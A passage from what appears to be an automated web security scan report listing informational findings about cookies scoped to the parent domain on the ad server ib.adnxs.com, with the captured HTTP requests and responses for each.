Cookie: icu=EAAYAA..; uuid2=4760492999213801733; anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ=FzXN9?TZi)>y1-^s2mzPD+@4+<i:[v#mk@cE3+b8?jraDJt@%+`'uLM/Dl+8<5/!Ww5LUeE=7?vbgm<6zEk@/WBJ[MOl!9-@aXV4)=rJOM@R5(?)a%ZJ2Wcbf*>2GHpO^8q6y4.W-*y?$3o38q>cC^S[A.LeTUm`>tMe:Vn15)3V9!][_fmn.CQInWmsln_lnhV2sS:M5*3DU7fN@fu#Pa!9L%Hn?en]; sess=1

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/click/K01KQbd3DUBJwvOPFK4KQAAAAGBmZgJAScLzjxSuCkArTUpBt3cNQAIa1VB5i6osBWHfHSmrEEJFz0JNAAAAADgQAQDLAQAANQEAAAIAAACGaAIAhWQAAAEAAABVU0QAVVNEANgCWgD2DLoDvgQBAgUCAAIAAAAAox0IPAAAAAA./cnd=!txXYTwjsLBCG0QkYACCFyQEougcxnEjEH7d3DUBCEwgAEAAYACABKP7__________wFIAFAAWPYZYABotQI./referrer=http:/www.nydailynews.com/blogs70f75/clickenc=http:/www.clickability.com/campaigns/Express_Datasheet.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 16:46:18 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 16:46:18 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/K01KQbd3DUBJwvOPFK4KQAAAAGBmZgJAScLzjxSuCkArTUpBt3cNQAIa1VB5i6osBWHfHSmrEEJFz0JNAAAAADgQAQDLAQAANQEAAAIAAACGaAIAhWQAAAEAAABVU0QAVVNEANgCWgD2DLoDvgQBAgUCAAIAAAAAox0IPAAAAAA./cnd=!txXYTwjsLBCG0QkYACCFyQEougcxnEjEH7d3DUBCEwgAEAAYACABKP7__________wFIAFAAWPYZYABotQI./referrer=http:/www.nydailynews.com/blogs70f75/clickenc=http:/www.clickability.com/campaigns/Express_Datasheet.html?sfcid=70180000000fUSJ HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:P4x>H+=q5PufidQD2]*](K9'9kOYZb; icu=EAAYAA..; uuid2=4760492999213801733; sess=1;

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 16:46:18 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 16:46:18 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 16:46:18 GMT; domain=.adnxs.com; HttpOnly
Location: http:/www.clickability.com/campaigns/Express_Datasheet.html?sfcid=70180000000fUSJ
Date: Fri, 28 Jan 2011 16:46:18 GMT
Content-Length: 0
Connection: close

10.61. http://ib.adnxs.com/getuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 16:46:21 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:P4x>H+=q5PufidQD2]*](K9'9kOYZb; icu=EAAYAA..; uuid2=4760492999213801733; sess=1;

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 16:46:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 16:46:21 GMT; domain=.adnxs.com; HttpOnly
Location: .c.7
Date: Fri, 28 Jan 2011 16:46:21 GMT
Content-Length: 0
Connection: close

10.62. http://ib.adnxs.com/getuidnb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/getuidnb

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 14:48:49 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuidnb?http%3A%2F%2Fpixel.rubiconproject.com%2Ftap.php%3Fv%3D4894%26nid%3D1986%26put%3D$UID%26expires%3D30 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:P4x>H+=q5PufidQD2]*](K9'9kOYZb

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 14:48:49 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 14:48:49 GMT; domain=.adnxs.com; HttpOnly
Location: http://pixel.rubiconproject.com/tap.php?v=4894&nid=1986&put=4760492999213801733&expires=30
Date: Fri, 28 Jan 2011 14:48:49 GMT
Content-Length: 0

10.63. http://ib.adnxs.com/getuidu previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/getuidu

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 17:37:32 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuidu?http://segment-pixel.invitemedia.com/setuid?exchange_id=2&exchange_uid=$UID HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&mktid=3&mpid=1051206&fpid=-1&rnd=3899286550461626968&nu=n&sp=n
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; uuid2=4760492999213801733; anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:$78zsR5OeIufidQD2]*](K9'=5f>*@; sess=1

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 17:37:32 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 17:37:32 GMT; domain=.adnxs.com; HttpOnly
Location: http://segment-pixel.invitemedia.com/setuid?exchange_id=2&exchange_uid=4760492999213801733
Date: Fri, 28 Jan 2011 17:37:32 GMT
Content-Length: 0

10.64. http://ib.adnxs.com/mapuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/mapuid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 14:14:50 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 14:14:50 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 14:14:50 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:P4x>H+=q5PufidQD2]*](K9'9kOYZb; path=/; expires=Thu, 28-Apr-2011 14:14:50 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=364&user=914803576615380,rcHW800iZiMAAocf HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/B3DM/DLX/1@x71
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:P4x>H+=q5PufidQD2]*](K9'9kOYZb

Response

10.65. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly
acb734371=5_[r^208WMM2x@N!@@-#c5UK9?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP-1DpNaIIcFyBWHfHSmrEEKCcENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEQgcBAgUCAAIAAAAAJiN9fwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265346%29%3Buf%28%27r%27%2C+116344%2C+1296265346%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.66. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:22 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:22 GMT; domain=.adnxs.com; HttpOnly
acb918937=5_[r^208WMM2x@N!@@-#at>$5?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP6yB-4ble5ZuBWHfHSmrEEJ-cENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE-gYBAgUCAAIAAAAAZSS2ugAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265342%29%3Buf%28%27r%27%2C+116344%2C+1296265342%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:22 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:22 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:22 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Fnews%2Fregional%2Fview%2F20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist%2Fsrvc%3Dhome%26position%3D4&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D853654%3Bcontx%3Dpolit%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.5569272553548217%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb402178=5_[r^208WMuF4Lw)IE.8)Oje[?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPxfdyj3sNwc8BWHfHSmrEELYO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE_AYBAgUCAAIAAAAAwCFK9AAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251864%29%3Buf%28%27r%27%2C+151403%2C+1296251864%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2811%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2887%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28619%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28620%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28621%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)

Response

10.67. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:28 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:28 GMT; domain=.adnxs.com; HttpOnly
acb130500=5_[r^208WMM2x@N!@@-#cn5^<?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP1oKi6Mn921PBWHfHSmrEEKEcENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEHAcBAgUCAAIAAAAA6CFsHQAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265348%29%3Buf%28%27r%27%2C+116344%2C+1296265348%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:28 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:28 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:28 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.68. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:27:12 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:27:12 GMT; domain=.adnxs.com; HttpOnly
acb510504=5_[r^208WMuF4Lw)IE.8w)IgJ?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPwQ_cisQ0NJ6BWHfHSmrEELAQkNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQENgYBAgUCAAIAAAAAlCBOvgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296253632%29%3Buf%28%27r%27%2C+151403%2C+1296253632%29%3Bppv%2882%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2884%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2811%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2882%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2884%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2887%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3Bppv%28619%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3Bppv%28620%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3Bppv%28621%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:27:12 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:27:12 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:27:12 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 22:27:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:27:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb502322=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:27:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb510504=5_[r^208WMuF4Lw)IE.8w)IgJ?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPwQ_cisQ0NJ6BWHfHSmrEELAQkNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQENgYBAgUCAAIAAAAAlCBOvgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296253632%29%3Buf%28%27r%27%2C+151403%2C+1296253632%29%3Bppv%2882%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2884%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2811%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2882%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2884%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2887%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3Bppv%28619%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3Bppv%28620%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3Bppv%28621%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:27:12 GMT; domain=.adnxs.com; HttpOnly
